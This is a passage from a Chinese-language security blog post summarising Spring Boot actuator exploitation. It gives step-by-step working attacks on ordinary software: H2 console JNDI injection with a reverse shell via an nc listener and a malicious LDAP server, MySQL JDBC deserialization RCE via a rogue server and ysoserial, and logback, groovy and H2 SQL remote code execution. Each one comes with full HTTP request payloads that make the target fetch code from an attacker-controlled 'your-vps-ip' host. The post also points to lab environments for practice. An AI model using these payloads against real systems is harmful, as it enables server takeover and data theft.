<p>编写优化过后的用来反弹 shell 的 <a href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java">Java 示例代码</a>  <code>JNDIObject.java</code>，</p>
<p>使用兼容低版本 jdk 的方式编译：</p>
<pre><code class="language-bash">javac -source 1.5 -target 1.5 JNDIObject.java
</code></pre>
<p>然后将生成的 <code>JNDIObject.class</code> 文件拷贝到 <strong>步骤二</strong> 中的网站根目录。</p>
<h5 id="步骤三托管-class-文件-1">步骤三：托管 class 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>将<strong>步骤二</strong>中编译好的 class 文件拷贝到 HTTP 服务器根目录。</p>
<h5 id="步骤四架设恶意-ldap-服务-1">步骤四：架设恶意 ldap 服务</h5>
<p>下载 <a href="https://github.com/mbechler/marshalsec">marshalsec</a> ，使用下面命令架设对应的 ldap 服务：</p>
<pre><code class="language-bash">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
</code></pre>
<h5 id="步骤五监听反弹-shell-的端口-2">步骤五：监听反弹 shell 的端口</h5>
<p>一般使用 nc 监听端口，等待反弹 shell</p>
<pre><code class="language-bash">nc -lv 443
</code></pre>
<h5 id="步骤六发包触发-jndi-注入">步骤六：发包触发 JNDI 注入</h5>
<p>根据实际情况，替换下面数据中的 <code>jsessionid=xxxxxx</code>、<code>www.example.com</code> 和 <code>ldap://your-vps-ip:1389/JNDIObject</code></p>
<pre><code class="language-bash">POST /h2-console/login.do?jsessionid=xxxxxx
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/h2-console/login.jsp?jsessionid=xxxxxx

language=en&amp;setting=Generic+H2+%28Embedded%29&amp;name=Generic+H2+%28Embedded%29&amp;driver=javax.naming.InitialContext&amp;url=ldap://your-vps-ip:1389/JNDIObject&amp;user=&amp;password=
</code></pre>
<h4 id="漏洞分析-6">漏洞分析：</h4>
<p>​	<a href="https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ">Spring Boot + H2数据库JNDI注入</a></p>
<h4 id="漏洞环境-6">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce">repository/springboot-h2-database-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9096/h2-console
</code></pre>
<h3 id="0x08mysql-jdbc-deserialization-rce">0x08：mysql jdbc deserialization RCE</h3>
<h4 id="利用条件-11">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code>spring-boot-starter-actuator</code> 依赖）</li>
<li>目标环境中存在 <code>mysql-connector-java</code> 依赖</li>
<li>目标可以请求攻击者的服务器（请求可出外网）</li>
</ul>
<h4 id="利用方法-11">利用方法：</h4>
<h5 id="步骤一查看环境依赖">步骤一：查看环境依赖</h5>
<p>GET 请求 <code>/env</code> 或 <code>/actuator/env</code>，搜索环境变量（classpath）中是否有 <code>mysql-connector-java</code>  关键词，并记录下其版本号（5.x 或 8.x）；</p>
<p>搜索并观察环境变量中是否存在常见的反序列化 gadget 依赖，比如  <code>commons-collections</code>、<code>Jdk7u21</code>、<code>Jdk8u20</code> 等；</p>
<p>搜索 <code>spring.datasource.url</code> 关键词，记录下其 <code>value</code>  值，方便后续恢复其正常 jdbc url 值。</p>
<h5 id="步骤二架设恶意-rogue-mysql-server">步骤二：架设恶意 rogue mysql server</h5>
<p>在自己控制的服务器上运行 <a href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py">springboot-jdbc-deserialization-rce.py</a> 脚本，并使用 <a href="https://github.com/frohoff/ysoserial">ysoserial</a> 自定义要执行的命令：</p>
<pre><code class="language-bash">java -jar ysoserial.jar CommonsCollections3 calc &gt; payload.ser
</code></pre>
<p>在脚本<strong>同目录下</strong>生成 <code>payload.ser</code> 反序列化 payload 文件，供脚本使用。</p>
<h5 id="步骤三设置-springdatasourceurl-属性">步骤三：设置 spring.datasource.url 属性</h5>
<blockquote>
<p>⚠️ 修改此属性会暂时导致网站所有的正常数据库服务不可用，会对业务造成影响，请谨慎操作！</p>
</blockquote>
<p>mysql-connector-java 5.x 版本设置<strong>属性值</strong>为：</p>
<pre><code>jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&amp;useSSL=false&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;autoDeserialize=true
</code></pre>
<p>mysql-connector-java 8.x 版本设置<strong>属性值</strong>为：</p>
<pre><code>jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&amp;useSSL=false&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;autoDeserialize=true
</code></pre>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.url=对应属性值
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;spring.datasource.url&quot;,&quot;value&quot;:&quot;对应属性值&quot;}
</code></pre>
<h5 id="步骤四刷新配置-1">步骤四：刷新配置</h5>
<p>spring 1.x</p>
<pre><code>POST /refresh
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/refresh
Content-Type: application/json

</code></pre>
<h5 id="步骤五触发数据库查询">步骤五：触发数据库查询</h5>
<p>尝试访问网站已知的数据库查询的接口，例如： <code>/product/list</code> ，或者寻找其他方式，主动触发源网站进行数据库查询，然后漏洞会被触发</p>
<h5 id="步骤六恢复正常-jdbc-url">步骤六：恢复正常 jdbc url</h5>
<p>反序列化漏洞利用完成后，使用 <strong>步骤三</strong> 的方法恢复 <strong>步骤一</strong> 中记录的 <code>spring.datasource.url</code> 的原始 <code>value</code> 值</p>
<h4 id="漏洞原理-6">漏洞原理：</h4>
<ol>
<li>spring.datasource.url 属性被设置为外部恶意 mysql jdbc url 地址</li>
<li>refresh 刷新后设置了一个新的 spring.datasource.url 属性值</li>
<li>当网站进行数据库查询等操作时，会尝试使用恶意 mysql jdbc url 建立新的数据库连接</li>
<li>然后恶意 mysql server 就会在建立连接的合适阶段返回反序列化 payload 数据</li>
<li>目标依赖的 mysql-connector-java 就会反序列化设置好的 gadget，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析-7">漏洞分析：</h4>
<p>​	<a href="https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf">New-Exploit-Technique-In-Java-Deserialization-Attack</a></p>
<h4 id="漏洞环境-7">漏洞环境：</h4>
<blockquote>
<p>需要配置 application.properties 中的 spring.datasource.url、spring.datasource.username、spring.datasource.password，保证可以正常连上 mysql 数据库，否则程序启动时就会报错退出</p>
</blockquote>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce">repository/springboot-mysql-jdbc-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9097/actuator/env
</code></pre>
<p>发送完 payload 后触发漏洞：</p>
<pre><code>http://127.0.0.1:9097/product/list
</code></pre>
<h3 id="0x09restart-loggingconfig-logback-jndi-rce">0x09：restart logging.config logback JNDI RCE</h3>
<h4 id="利用条件-12">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/restart</code> 接口重启应用</li>
<li>普通 JNDI 注入受目标 JDK 版本影响，jdk &lt; 6u201/7u191/8u182/11.0.1(LDAP)，但相关环境可绕过</li>
<li>⚠️ 目标可以请求攻击者的 HTTP 服务器（请求可出外网），否则 restart 会导致程序异常退出</li>
<li>⚠️ HTTP 服务器如果返回含有畸形 xml 语法内容的文件，会导致程序异常退出</li>
<li>⚠️ JNDI 服务返回的 object 需要实现 <code>javax.naming.spi.ObjectFactory</code> 接口，否则会导致程序异常退出</li>
</ul>
<h4 id="利用方法-12">利用方法：</h4>
<h5 id="步骤一托管-xml-文件">步骤一：托管 xml 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>在根目录放置以 <code>xml</code> 结尾的  <code>example.xml</code> 文件，实际内容要根据步骤二中使用的 JNDI 服务来确定：</p>
<pre><code class="language-xml">&lt;configuration&gt;
  &lt;insertFromJNDI env-entry-name=&quot;ldap://your-vps-ip:1389/TomcatBypass/Command/Base64/b3BlbiAtYSBDYWxjdWxhdG9y&quot; as=&quot;appName&quot; /&gt;
&lt;/configuration&gt;
</code></pre>
<h5 id="步骤二托管恶意-ldap-服务及代码">步骤二：托管恶意 ldap 服务及代码</h5>
<p>参考<a href="https://landgrey.me/blog/21/">文章</a>，修改 <a href="https://github.com/feihong-cs/JNDIExploit">JNDIExploit</a> 并启动（也可以使用其他方法）：</p>
<pre><code class="language-bash">java -jar JNDIExploit-1.0-SNAPSHOT.jar -i your-vps-ip
</code></pre>
<h5 id="步骤三设置-loggingconfig-属性">步骤三：设置 logging.config 属性</h5>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

logging.config=http://your-vps-ip/example.xml
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;logging.config&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example.xml&quot;}
</code></pre>
<h5 id="步骤四重启应用">步骤四：重启应用</h5>
<p>spring 1.x</p>
<pre><code>POST /restart
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/restart
Content-Type: application/json

</code></pre>
<h4 id="漏洞原理-7">漏洞原理：</h4>
<ol>
<li>目标机器通过 logging.config 属性设置 logback 日志配置文件 URL 地址</li>
<li>restart 重启应用后，程序会请求 URL 地址获得恶意 xml 文件内容</li>
<li>目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞)</li>
<li>xml 文件中利用 <code>logback</code> 依赖的 <code>insertFormJNDI</code> 标签，设置了外部 JNDI 服务器地址</li>
<li>目标机器请求恶意  JNDI 服务器，导致 JNDI 注入，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析-8">漏洞分析：</h4>
<p>​	<a href="https://xz.aliyun.com/t/4258">spring boot actuator rce via jolokia</a></p>
<p>​	https://landgrey.me/blog/21/</p>
<h4 id="漏洞环境-8">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce">repository/springboot-restart-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9098/actuator/env
</code></pre>
<h3 id="0x0arestart-loggingconfig-groovy-rce">0x0A：restart logging.config groovy RCE</h3>
<h4 id="利用条件-13">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/restart</code> 接口重启应用</li>
<li>⚠️ 目标可以请求攻击者的 HTTP 服务器（请求可出外网），否则 restart 会导致程序异常退出</li>
<li>⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件，会导致程序异常退出</li>
<li>⚠️ 环境中需要存在 groovy 依赖，否则会导致程序异常退出</li>
</ul>
<h4 id="利用方法-13">利用方法：</h4>
<h5 id="步骤一托管-groovy-文件">步骤一：托管 groovy 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>在根目录放置以 <code>groovy</code> 结尾的  <code>example.groovy</code> 文件，内容为需要执行的 groovy 代码，比如：</p>
<pre><code class="language-xml">Runtime.getRuntime().exec(&quot;open -a Calculator&quot;)

</code></pre>
<h5 id="步骤二设置-loggingconfig-属性">步骤二：设置 logging.config 属性</h5>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

logging.config=http://your-vps-ip/example.groovy
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;logging.config&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example.groovy&quot;}
</code></pre>
<h5 id="步骤三重启应用">步骤三：重启应用</h5>
<p>spring 1.x</p>
<pre><code>POST /restart
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/restart
Content-Type: application/json

</code></pre>
<h4 id="漏洞原理-8">漏洞原理：</h4>
<ol>
<li>目标机器通过 logging.config 属性设置 logback 日志配置文件 URL 地址</li>
<li>restart 重启应用后，程序会请求设置的 URL 地址</li>
<li><code>logback-classic</code> 组件的 <code>ch.qos.logback.classic.util.ContextInitializer.java</code> 代码文件逻辑中会判断 url 是否以 <code>groovy</code> 结尾</li>
<li>如果 url 以 <code>groovy</code> 结尾，则最终会执行文件内容中的 groovy 代码，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞环境-9">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce">repository/springboot-restart-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9098/actuator/env
</code></pre>
<h3 id="0x0brestart-springmainsources-groovy-rce">0x0B：restart spring.main.sources groovy RCE</h3>
<h4 id="利用条件-14">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/restart</code> 接口重启应用</li>
<li>⚠️ 目标可以请求攻击者的 HTTP 服务器（请求可出外网），否则 restart 会导致程序异常退出</li>
<li>⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件，会导致程序异常退出</li>
<li>⚠️ 环境中需要存在 groovy 依赖，否则会导致程序异常退出</li>
</ul>
<h4 id="利用方法-14">利用方法：</h4>
<h5 id="步骤一托管-groovy-文件-1">步骤一：托管 groovy 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>在根目录放置以 <code>groovy</code> 结尾的  <code>example.groovy</code> 文件，内容为需要执行的 groovy 代码，比如：</p>
<pre><code class="language-xml">Runtime.getRuntime().exec(&quot;open -a Calculator&quot;)

</code></pre>
<h5 id="步骤二设置-springmainsources-属性">步骤二：设置 spring.main.sources 属性</h5>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

spring.main.sources=http://your-vps-ip/example.groovy
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;spring.main.sources&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example.groovy&quot;}
</code></pre>
<h5 id="步骤三重启应用-1">步骤三：重启应用</h5>
<p>spring 1.x</p>
<pre><code>POST /restart
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/restart
Content-Type: application/json

</code></pre>
<h4 id="漏洞原理-9">漏洞原理：</h4>
<ol>
<li>目标机器可以通过 spring.main.sources 属性来设置创建 ApplicationContext 的额外源的 URL 地址</li>
<li>restart 重启应用后，程序会请求设置的 URL 地址</li>
<li><code>spring-boot</code> 组件中的 <code>org.springframework.boot.BeanDefinitionLoader.java</code> 文件代码逻辑中会判断 url 是否以 <code>.groovy</code> 结尾</li>
<li>如果 url 以 <code>.groovy</code> 结尾，则最终会执行文件内容中的 groovy 代码，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞环境-10">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce">repository/springboot-restart-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9098/actuator/env
</code></pre>
<h3 id="0x0crestart-springdatasourcedata-h2-database-rce">0x0C：restart spring.datasource.data h2 database RCE</h3>
<h4 id="利用条件-15">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/restart</code> 接口重启应用</li>
<li>环境中需要存在 <code>h2database</code>、<code>spring-boot-starter-data-jpa</code> 相关依赖</li>
<li>⚠️ 目标可以请求攻击者的 HTTP 服务器（请求可出外网），否则 restart 会导致程序异常退出</li>
<li>⚠️ HTTP 服务器如果返回含有畸形 h2 sql 语法内容的文件，会导致程序异常退出</li>
</ul>
<h4 id="利用方法-15">利用方法：</h4>
<h5 id="步骤一托管-sql-文件">步骤一：托管 sql 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>在根目录放置以任意名字的文件，内容为需要执行的 h2 sql 代码，比如：</p>
<blockquote>
<p>⚠️ 下面payload 中的 &lsquo;T5&rsquo; 方法只能 restart 执行一次；后面 restart 需要更换新的方法名称 (如 T6) 和设置新的 sql URL 地址，然后才能被 restart 重新使用，否则第二次 restart 重启应用时会导致程序异常退出</p>
</blockquote>
<pre><code class="language-xml">CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('/bin/bash','-c','open -a Calculator');
</code></pre>
<h5 id="步骤二设置-springdatasourcedata-属性">步骤二：设置 spring.datasource.data 属性</h5>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.data=http://your-vps-ip/example.sql
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;spring.datasource.data&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example.sql&quot;}
</code></pre>
<h5 id="步骤三重启应用-2">步骤三：重启应用</h5>
<p>spring 1.x</p>
<pre><code>POST /restart
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/restart
Content-Type: application/json

</code></pre>
<h4 id="漏洞原理-10">漏洞原理：</h4>
<ol>
<li>目标机器可以通过 spring.datasource.data 属性来设置 jdbc DML sql 文件的 URL 地址</li>
<li>restart 重启应用后，程序会请求设置的 URL 地址</li>
<li><code>spring-boot-autoconfigure</code> 组件中的 <code>org.springframework.boot.autoconfigure.jdbc.DataSourceInitializer.java</code> 文件代码逻辑中会使用 <code>runScripts</code> 方法执行请求 URL 内容中的 h2 database sql 代码，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞环境-11">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce">repository/springboot-restart-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9098/actuator/env
</code></pre>

    </div>
    <div class="article-footer">
<blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接: </strong>
      <a href="https://ad-calcium.github.io/2021/12/springboot%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/" title="SpringBoot漏洞利用总结" target="_blank" rel="external">https://ad-calcium.github.io/2021/12/springboot%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/</a>
    </li>
    <li class="post-copyright-license">
      <strong>License: </strong>
        <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN</a>
    </li>
  </ul>
</blockquote>

<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/ad-calcium" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="https://ad-calcium.github.io/avatar.png" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/ad-calcium" target="_blank"><span class="text-dark">AD钙奶</span><small class="ml-1x"></small></a></h3>
        <div>Good Good Study, Day Day Up~</div>
      </div>
    </figure>
  </div>
</div>

    </div>
  </article>
</div><nav class="bar bar-footer clearfix" data-stick-bottom>
    <div class="bar-inner">
        <ul class="pager pull-left">
            <li class="prev">
                <a href="https://ad-calcium.github.io/2021/12/grafana%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Ecve-2021-43798/" title="Grafana任意文件读取漏洞(CVE-2021-43798)"><i
                        class="icon icon-angle-left"
                        aria-hidden="true"></i><span>&nbsp;&nbsp;下一篇</span></a>
            </li>
            <li class="next">
                <a href="https://ad-calcium.github.io/2021/12/apache-log4j%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/"
                    title="Apache Log4j任意代码执行漏洞"><span>上一篇&nbsp;&nbsp;</span><i
                        class="icon icon-angle-right" aria-hidden="true"></i></a>
            </li>
            
            <li class="toggle-toc">
                <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false"
                    title="文章目录" role="button">
                    <span>[&nbsp;</span><span>文章目录</span>
                    <i class="text-collapsed icon icon-anchor"></i>
                    <i class="text-in icon icon-close"></i>
                    <span>]</span>
                </a>
            </li>
        </ul>
        <div class="bar-right">
            <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter"
                data-mobile-sites="weibo,qq,qzone"></div>
        </div>
    </div>
</nav>


</main><footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
  <div class="copyright">
    &copy;2020  -
    2021

    
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_SVG"></script>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
            showMathMenu: false, //disables context menu
            tex2jax: {
            inlineMath: [ ['$','$'], ['\\(','\\)'] ]
           }
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
<script>
    window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/highlight.min.js"></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/python.min.js" defer></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/javascript.min.js" defer></script><script>
    hljs.configure({
        tabReplace: '    ', 
        classPrefix: ''     
        
    })
    hljs.initHighlightingOnLoad();
</script>
<script src="https://ad-calcium.github.io/js/application.min.a94ab19cb63a95c8d7fbd7b85cab3ddeea8c369bdf75b9cab6708787ead123af.js"></script>
<script src="https://ad-calcium.github.io/js/plugin.min.19c5bcb2fb0789ab4f2b7834e5ceb5e92635645605bab902c1024b25f1502364.js"></script>

<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(未命名)',
            },
            ROOT_URL: 'https:\/\/ad-calcium.github.io\/',
            CONTENT_URL: 'https:\/\/ad-calcium.github.io\/\/searchindex.json ',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script type="text/javascript" src="https://ad-calcium.github.io/js/insight.min.4a2d52de4bfff73e0c688404fe3d17c9a3ae12d9888e1e1ac9c690e4890de2ded50fe55f2b819c2ba55435a76f396f3ea6805765f0b0af5635cdf74ea459eab0.js" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
<script>
    tocbot.init({
        
        tocSelector: '.js-toc',
        
        contentSelector: '.js-toc-content',
        
        headingSelector: 'h1, h2, h3',
        
        hasInnerContainers: true,
    });
</script>


<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-289626488-X', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>

  </body>
</html>
